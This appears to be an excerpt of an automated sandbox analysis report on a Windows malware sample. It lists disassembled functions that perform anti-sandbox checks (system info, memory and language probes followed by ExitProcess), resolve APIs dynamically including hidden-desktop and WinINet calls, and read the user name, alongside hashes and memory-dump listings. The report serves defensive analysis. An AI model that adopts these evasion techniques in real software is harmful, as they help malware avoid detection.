                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: bd72beb62521b8a10effcc597299b7366c7e583dce5e7699f969fff35fd28972
                                  • Instruction ID: a616803302d87ca82bdee03b74c0601620ee61ffddea9250573918a37188c107
                                  • Opcode Fuzzy Hash: bd72beb62521b8a10effcc597299b7366c7e583dce5e7699f969fff35fd28972
                                  • Instruction Fuzzy Hash: 49A141B5AA12009FD754DF64FD4CA2A37B9F7A87513108519E91EC3364DB34A888FB70
                                  Function 00361BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2141 361bf0-361c0b call 342a90 call 366390 2146 361c0d 2141->2146 2147 361c1a-361c27 call 342930 2141->2147 2148 361c10-361c18 2146->2148 2151 361c35-361c63 2147->2151 2152 361c29-361c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 361c65-361c67 ExitProcess 2151->2156 2157 361c6d-361c7b GetSystemInfo 2151->2157 2152->2151 2158 361c85-361ca0 call 341030 call 3410c0 GetUserDefaultLangID 2157->2158 2159 361c7d-361c7f ExitProcess 2157->2159 2164 361ca2-361ca9 2158->2164 2165 361cb8-361cca call 362ad0 call 363e10 2158->2165 2164->2165 2166 361cb0-361cb2 ExitProcess 2164->2166 2171 361ce7-361d06 lstrlen call 342930 2165->2171 2172 361ccc-361cde call 362a40 call 363e10 2165->2172 2177 361d23-361d40 lstrlen call 342930 2171->2177 2178 361d08-361d0d 2171->2178 2172->2171 2183 361ce0-361ce1 ExitProcess 2172->2183 2186 361d42-361d44 2177->2186 2187 361d5a-361d7b call 362ad0 lstrlen call 342930 2177->2187 2178->2177 2181 361d0f-361d11 2178->2181 2181->2177 2184 361d13-361d1d lstrcpy lstrcat 2181->2184 2184->2177 2186->2187 2188 361d46-361d54 lstrcpy lstrcat 2186->2188 2193 361d7d-361d7f 2187->2193 2194 361d9a-361db4 lstrlen call 342930 2187->2194 2188->2187 2193->2194 2195 361d81-361d85 2193->2195 2199 361db6-361db8 2194->2199 2200 361dce-361deb call 362a40 lstrlen call 342930 2194->2200 2195->2194 2197 361d87-361d94 lstrcpy lstrcat 2195->2197 2197->2194 2199->2200 2201 361dba-361dc8 lstrcpy lstrcat 2199->2201 2206 361ded-361def 2200->2206 2207 361e0a-361e0f 2200->2207 2201->2200 2206->2207 2208 361df1-361df5 2206->2208 2209 361e16-361e22 call 342930 2207->2209 2210 361e11 call 342a20 2207->2210 2208->2207 2211 361df7-361e04 lstrcpy lstrcat 2208->2211 2215 361e24-361e26 2209->2215 2216 361e30-361e66 call 342a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 361e28-361e2a lstrcpy 2215->2217 2228 361e8c-361ea0 CreateEventA call 361b20 call 35ffd0 2216->2228 2229 361e68-361e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 361ea5-361eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                  APIs
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA05B8), ref: 003663E9
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0750), ref: 00366402
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0528), ref: 0036641A
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA05D0), ref: 00366432
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA8AB8), ref: 0036644B
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00F96220), ref: 00366463
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00F96380), ref: 0036647B
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0768), ref: 00366494
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0600), ref: 003664AC
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0540), ref: 003664C4
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0618), ref: 003664DD
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00F96520), ref: 003664F5
                                    • Part of subcall function 00366390: GetProcAddress.KERNEL32(76F70000,00FA0648), ref: 0036650D
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00361C2F
                                  • ExitProcess.KERNEL32 ref: 00361C67
                                  • GetSystemInfo.KERNEL32(?), ref: 00361C71
                                  • ExitProcess.KERNEL32 ref: 00361C7F
                                    • Part of subcall function 00341030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00341046
                                    • Part of subcall function 00341030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0034104D
                                    • Part of subcall function 00341030: ExitProcess.KERNEL32 ref: 00341058
                                    • Part of subcall function 003410C0: GlobalMemoryStatusEx.KERNEL32 ref: 003410EA
                                    • Part of subcall function 003410C0: ExitProcess.KERNEL32 ref: 00341114
                                  • GetUserDefaultLangID.KERNEL32 ref: 00361C8F
                                  • ExitProcess.KERNEL32 ref: 00361CB2
                                  • ExitProcess.KERNEL32 ref: 00361CE1
                                  • lstrlen.KERNEL32(00FA8A78), ref: 00361CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00361D15
                                  • lstrcat.KERNEL32(00000000,00FA8A78), ref: 00361D1D
                                  • lstrlen.KERNEL32(00374B98), ref: 00361D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361D48
                                  • lstrcat.KERNEL32(00000000,00374B98), ref: 00361D54
                                  • lstrlen.KERNEL32(00000000), ref: 00361D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361D94
                                  • lstrlen.KERNEL32(00374B98), ref: 00361D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361DBC
                                  • lstrcat.KERNEL32(00000000,00374B98), ref: 00361DC8
                                  • lstrlen.KERNEL32(00000000), ref: 00361DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: b3482d304dce2658bdf6d4a145d227ea7ca2699fc80b26dde91dd2d208c95ee8
                                  • Instruction ID: e75bff62fbc63175062b98be93cd0072607b1d32455f30d9e175b81f10dbbc5f
                                  • Opcode Fuzzy Hash: b3482d304dce2658bdf6d4a145d227ea7ca2699fc80b26dde91dd2d208c95ee8
                                  • Instruction Fuzzy Hash: E171B531550216ABC722AFB0EC4DF7F7AB9AF55701F098024F90AAA1A5DF70D845EB70
                                  Function 00344A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2850 344a60-344afc RtlAllocateHeap 2867 344afe-344b03 2850->2867 2868 344b7a-344bbe VirtualProtect 2850->2868 2869 344b06-344b78 2867->2869 2869->2868
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00344AA3
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00344BB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-3329630956
                                  • Opcode ID: 634aa0d8bac7c2be104dff2594033968460eda6fa5f40723dc786aac40294c02
                                  • Instruction ID: 6addf7966c6c4922ccc9b1a3e08ccc53b1c43b542b7bdb1cd6a009e3fd5332df
                                  • Opcode Fuzzy Hash: 634aa0d8bac7c2be104dff2594033968460eda6fa5f40723dc786aac40294c02
                                  • Instruction Fuzzy Hash: D331F81AF842BC769632EBEF4C47FDFAE55DF86750B028056F60C57180CBA97401CAA2
                                  Function 00362A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00362A6F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00362A76
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00362A8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 3b5cae1e76f05ecd8e6c2a3d433161097c35a007492b1d2bdb9e58001cb5a128
                                  • Instruction ID: f5ceed3c068ee9aa8ddf20af2acf2377545f1f8b4e9fbf4b58885149a72f0375
                                  • Opcode Fuzzy Hash: 3b5cae1e76f05ecd8e6c2a3d433161097c35a007492b1d2bdb9e58001cb5a128
                                  • Instruction Fuzzy Hash: 20F0B4B1A40604ABC700DF88ED49F9EBBBCF704B21F100216F919E3380D77419048AA1
                                  Function 003666E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 3666e0-3666e7 634 366afe-366b92 LoadLibraryA * 8 633->634 635 3666ed-366af9 GetProcAddress * 43 633->635 636 366b94-366c03 GetProcAddress * 5 634->636 637 366c08-366c0f 634->637 635->634 636->637 638 366c15-366ccd GetProcAddress * 8 637->638 639 366cd2-366cd9 637->639 638->639 640 366d4f-366d56 639->640 641 366cdb-366d4a GetProcAddress * 5 639->641 642 366d5c-366de4 GetProcAddress * 6 640->642 643 366de9-366df0 640->643 641->640 642->643 644 366df6-366f0b GetProcAddress * 12 643->644 645 366f10-366f17 643->645 644->645 646 366f8d-366f94 645->646 647 366f19-366f88 GetProcAddress * 5 645->647 648 366f96-366fbc GetProcAddress * 2 646->648 649 366fc1-366fc8 646->649 647->646 648->649 650 366ff5-366ffc 649->650 651 366fca-366ff0 GetProcAddress * 2 649->651 652 367002-3670e8 GetProcAddress * 10 650->652 653 3670ed-3670f4 650->653 651->650 652->653 654 3670f6-36714d GetProcAddress * 4 653->654 655 367152-367159 653->655 654->655 656 36716e-367175 655->656 657 36715b-367169 GetProcAddress 655->657 658 367177-3671ce GetProcAddress * 4 656->658 659 3671d3 656->659 657->656 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(76F70000,00F96480), ref: 003666F5
                                  • GetProcAddress.KERNEL32(76F70000,00F965A0), ref: 0036670D
                                  • GetProcAddress.KERNEL32(76F70000,00FA8F70), ref: 00366726
                                  • GetProcAddress.KERNEL32(76F70000,00FA8EB0), ref: 0036673E
                                  • GetProcAddress.KERNEL32(76F70000,00FAC7A0), ref: 00366756
                                  • GetProcAddress.KERNEL32(76F70000,00FAC830), ref: 0036676F
                                  • GetProcAddress.KERNEL32(76F70000,00F9B3C8), ref: 00366787
                                  • GetProcAddress.KERNEL32(76F70000,00FAC848), ref: 0036679F
                                  • GetProcAddress.KERNEL32(76F70000,00FAC8C0), ref: 003667B8
                                  • GetProcAddress.KERNEL32(76F70000,00FAC740), ref: 003667D0
                                  • GetProcAddress.KERNEL32(76F70000,00FAC8F0), ref: 003667E8
                                  • GetProcAddress.KERNEL32(76F70000,00F96340), ref: 00366801
                                  • GetProcAddress.KERNEL32(76F70000,00F961C0), ref: 00366819
                                  • GetProcAddress.KERNEL32(76F70000,00F96420), ref: 00366831
                                  • GetProcAddress.KERNEL32(76F70000,00F96200), ref: 0036684A
                                  • GetProcAddress.KERNEL32(76F70000,00FAC818), ref: 00366862
                                  • GetProcAddress.KERNEL32(76F70000,00FAC8D8), ref: 0036687A
                                  • GetProcAddress.KERNEL32(76F70000,00F9B170), ref: 00366893
                                  • GetProcAddress.KERNEL32(76F70000,00F96360), ref: 003668AB
                                  • GetProcAddress.KERNEL32(76F70000,00FAC7B8), ref: 003668C3
                                  • GetProcAddress.KERNEL32(76F70000,00FAC7D0), ref: 003668DC
                                  • GetProcAddress.KERNEL32(76F70000,00FAC860), ref: 003668F4
                                  • GetProcAddress.KERNEL32(76F70000,00FAC878), ref: 0036690C
                                  • GetProcAddress.KERNEL32(76F70000,00F96240), ref: 00366925
                                  • GetProcAddress.KERNEL32(76F70000,00FAC758), ref: 0036693D
                                  • GetProcAddress.KERNEL32(76F70000,00FAC788), ref: 00366955
                                  • GetProcAddress.KERNEL32(76F70000,00FAC890), ref: 0036696E
                                  • GetProcAddress.KERNEL32(76F70000,00FAC770), ref: 00366986
                                  • GetProcAddress.KERNEL32(76F70000,00FAC7E8), ref: 0036699E
                                  • GetProcAddress.KERNEL32(76F70000,00FAC800), ref: 003669B7
                                  • GetProcAddress.KERNEL32(76F70000,00FAC8A8), ref: 003669CF
                                  • GetProcAddress.KERNEL32(76F70000,00FAC368), ref: 003669E7
                                  • GetProcAddress.KERNEL32(76F70000,00FAC218), ref: 00366A00
                                  • GetProcAddress.KERNEL32(76F70000,00FACBB8), ref: 00366A18
                                  • GetProcAddress.KERNEL32(76F70000,00FAC260), ref: 00366A30
                                  • GetProcAddress.KERNEL32(76F70000,00FAC380), ref: 00366A49
                                  • GetProcAddress.KERNEL32(76F70000,00F963A0), ref: 00366A61
                                  • GetProcAddress.KERNEL32(76F70000,00FAC230), ref: 00366A79
                                  • GetProcAddress.KERNEL32(76F70000,00F963C0), ref: 00366A92
                                  • GetProcAddress.KERNEL32(76F70000,00FAC398), ref: 00366AAA
                                  • GetProcAddress.KERNEL32(76F70000,00FAC350), ref: 00366AC2
                                  • GetProcAddress.KERNEL32(76F70000,00F96400), ref: 00366ADB
                                  • GetProcAddress.KERNEL32(76F70000,00F96440), ref: 00366AF3
                                  • LoadLibraryA.KERNEL32(00FAC290,0036051F), ref: 00366B05
                                  • LoadLibraryA.KERNEL32(00FAC320), ref: 00366B16
                                  • LoadLibraryA.KERNEL32(00FAC338), ref: 00366B28
                                  • LoadLibraryA.KERNEL32(00FAC278), ref: 00366B3A
                                  • LoadLibraryA.KERNEL32(00FAC158), ref: 00366B4B
                                  • LoadLibraryA.KERNEL32(00FAC1A0), ref: 00366B5D
                                  • LoadLibraryA.KERNEL32(00FAC2A8), ref: 00366B6F
                                  • LoadLibraryA.KERNEL32(00FAC200), ref: 00366B80
                                  • GetProcAddress.KERNEL32(75840000,00F96820), ref: 00366B9C
                                  • GetProcAddress.KERNEL32(75840000,00FAC2C0), ref: 00366BB4
                                  • GetProcAddress.KERNEL32(75840000,00FA8A28), ref: 00366BCD
                                  • GetProcAddress.KERNEL32(75840000,00FAC140), ref: 00366BE5
                                  • GetProcAddress.KERNEL32(75840000,00F96620), ref: 00366BFD
                                  • GetProcAddress.KERNEL32(73C10000,00F9B008), ref: 00366C1D
                                  • GetProcAddress.KERNEL32(73C10000,00F965E0), ref: 00366C35
                                  • GetProcAddress.KERNEL32(73C10000,00F9B058), ref: 00366C4E
                                  • GetProcAddress.KERNEL32(73C10000,00FAC3B0), ref: 00366C66
                                  • GetProcAddress.KERNEL32(73C10000,00FAC170), ref: 00366C7E
                                  • GetProcAddress.KERNEL32(73C10000,00F96780), ref: 00366C97
                                  • GetProcAddress.KERNEL32(73C10000,00F96800), ref: 00366CAF
                                  • GetProcAddress.KERNEL32(73C10000,00FAC3C8), ref: 00366CC7
                                  • GetProcAddress.KERNEL32(760B0000,00F966C0), ref: 00366CE3
                                  • GetProcAddress.KERNEL32(760B0000,00F96740), ref: 00366CFB
                                  • GetProcAddress.KERNEL32(760B0000,00FAC2F0), ref: 00366D14
                                  • GetProcAddress.KERNEL32(760B0000,00FAC3E0), ref: 00366D2C
                                  • GetProcAddress.KERNEL32(760B0000,00F96900), ref: 00366D44
                                  • GetProcAddress.KERNEL32(75D30000,00F9B0A8), ref: 00366D64
                                  • GetProcAddress.KERNEL32(75D30000,00F9B1C0), ref: 00366D7C
                                  • GetProcAddress.KERNEL32(75D30000,00FAC1E8), ref: 00366D95
                                  • GetProcAddress.KERNEL32(75D30000,00F96840), ref: 00366DAD
                                  • GetProcAddress.KERNEL32(75D30000,00F965C0), ref: 00366DC5
                                  • GetProcAddress.KERNEL32(75D30000,00F9AEC8), ref: 00366DDE
                                  • GetProcAddress.KERNEL32(753A0000,00FAC308), ref: 00366DFE
                                  • GetProcAddress.KERNEL32(753A0000,00F96660), ref: 00366E16
                                  • GetProcAddress.KERNEL32(753A0000,00FA8B28), ref: 00366E2F
                                  • GetProcAddress.KERNEL32(753A0000,00FAC3F8), ref: 00366E47
                                  • GetProcAddress.KERNEL32(753A0000,00FAC248), ref: 00366E5F
                                  • GetProcAddress.KERNEL32(753A0000,00F96600), ref: 00366E78
                                  • GetProcAddress.KERNEL32(753A0000,00F96640), ref: 00366E90
                                  • GetProcAddress.KERNEL32(753A0000,00FAC410), ref: 00366EA8
                                  • GetProcAddress.KERNEL32(753A0000,00FAC2D8), ref: 00366EC1
                                  • GetProcAddress.KERNEL32(753A0000,CreateDesktopA), ref: 00366ED7
                                  • GetProcAddress.KERNEL32(753A0000,OpenDesktopA), ref: 00366EEE
                                  • GetProcAddress.KERNEL32(753A0000,CloseDesktop), ref: 00366F05
                                  • GetProcAddress.KERNEL32(76DA0000,00F96760), ref: 00366F21
                                  • GetProcAddress.KERNEL32(76DA0000,00FAC428), ref: 00366F39
                                  • GetProcAddress.KERNEL32(76DA0000,00FAC188), ref: 00366F52
                                  • GetProcAddress.KERNEL32(76DA0000,00FAC1B8), ref: 00366F6A
                                  • GetProcAddress.KERNEL32(76DA0000,00FAC1D0), ref: 00366F82
                                  • GetProcAddress.KERNEL32(77300000,00F967A0), ref: 00366F9E
                                  • GetProcAddress.KERNEL32(77300000,00F966A0), ref: 00366FB6
                                  • GetProcAddress.KERNEL32(767E0000,00F968C0), ref: 00366FD2
                                  • GetProcAddress.KERNEL32(767E0000,00FAC6E0), ref: 00366FEA
                                  • GetProcAddress.KERNEL32(6F6A0000,00F96680), ref: 0036700A
                                  • GetProcAddress.KERNEL32(6F6A0000,00F967C0), ref: 00367022
                                  • GetProcAddress.KERNEL32(6F6A0000,00F96860), ref: 0036703B
                                  • GetProcAddress.KERNEL32(6F6A0000,00FAC488), ref: 00367053
                                  • GetProcAddress.KERNEL32(6F6A0000,00F96920), ref: 0036706B
                                  • GetProcAddress.KERNEL32(6F6A0000,00F96880), ref: 00367084
                                  • GetProcAddress.KERNEL32(6F6A0000,00F968A0), ref: 0036709C
                                  • GetProcAddress.KERNEL32(6F6A0000,00F966E0), ref: 003670B4
                                  • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 003670CB
                                  • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 003670E2
                                  • GetProcAddress.KERNEL32(75760000,00FAC680), ref: 003670FE
                                  • GetProcAddress.KERNEL32(75760000,00FA8B58), ref: 00367116
                                  • GetProcAddress.KERNEL32(75760000,00FAC650), ref: 0036712F
                                  • GetProcAddress.KERNEL32(75760000,00FAC5A8), ref: 00367147
                                  • GetProcAddress.KERNEL32(762C0000,00F96940), ref: 00367163
                                  • GetProcAddress.KERNEL32(70000000,00FAC728), ref: 0036717F
                                  • GetProcAddress.KERNEL32(70000000,00F967E0), ref: 00367197
                                  • GetProcAddress.KERNEL32(70000000,00FAC698), ref: 003671B0
                                  • GetProcAddress.KERNEL32(70000000,00FAC590), ref: 003671C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                  • API String ID: 2238633743-3468015613
                                  • Opcode ID: ac772bf242b9145505c37b17c6fb4640dfb795844d90ce98b7ddce2c59b07f66
                                  • Instruction ID: 3c22b8591c0068e048dae93f12d4d42862b4e8fe6121888a1b16df6fb4a22fff
                                  • Opcode Fuzzy Hash: ac772bf242b9145505c37b17c6fb4640dfb795844d90ce98b7ddce2c59b07f66
                                  • Instruction Fuzzy Hash: B0621DB56A12009FD754DF64FC8CA2A37BAF7A87513108919E95D83364DB34A8C8FB70
                                  Function 0035F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0035F1D5
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F1F1
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0035F1FC
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035F215
                                  • lstrlen.KERNEL32(0036CFEC), ref: 0035F220
